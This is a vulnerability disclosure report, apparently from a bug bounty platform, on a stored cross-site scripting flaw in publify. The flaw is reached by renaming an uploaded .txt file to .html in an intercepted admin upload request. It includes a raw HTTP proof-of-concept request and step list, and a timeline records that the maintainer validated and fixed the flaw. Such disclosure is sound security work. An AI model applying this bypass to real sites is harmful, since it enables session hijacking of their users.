Bypass Restriction and File Upload Leads to XSS Stored - TXT to HTML in publify/publify


Reported on

May 19th 2022


Unrestricted file upload allowed the attacker to manipulate the request and bypass the protection of HTML files using a text file, XSS Stored was obtained when uploading the HTML file.

Proof of Concept

POST /admin/resources/upload HTTP/1.1
Cookie: _publify_blog_session=SESSION_HERE
Content-Length: 649
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR7LwpeBoKn4f7hI5
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Content-Disposition: form-data; name="utf8"

Content-Disposition: form-data; name="authenticity_token"

Content-Disposition: form-data; name="upload"; filename="w00t.txt" -- Change to w00t.html
Content-Type: text/plain

Content-Disposition: form-data; name="commit"


  • Step 1 - Upload a .txt file and intercept the request

  • Step 2 - Change the extension of filename to .html

  • Step 3 - Submit a request and the file will be uploaded successfully



Successful exploitation of cross-site scripting vulnerabilities allows an attacker to run arbitrary script code in the context of the affected user. This can be used to compromise the integrity of content returned by the webserver to take over a user's session, redirect the user to a malicious website.

We are processing your report and will contact the publify team within 24 hours. a month ago
We have contacted a member of the publify team and are waiting to hear back a month ago
publify/publify maintainer has acknowledged this report a month ago
Matijs van Zuijlen validated this vulnerability a month ago
Jonatas has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Matijs van Zuijlen confirmed that a fix has been merged on 0fb6b0 a month ago
Matijs van Zuijlen has been awarded the fix bounty
to join this conversation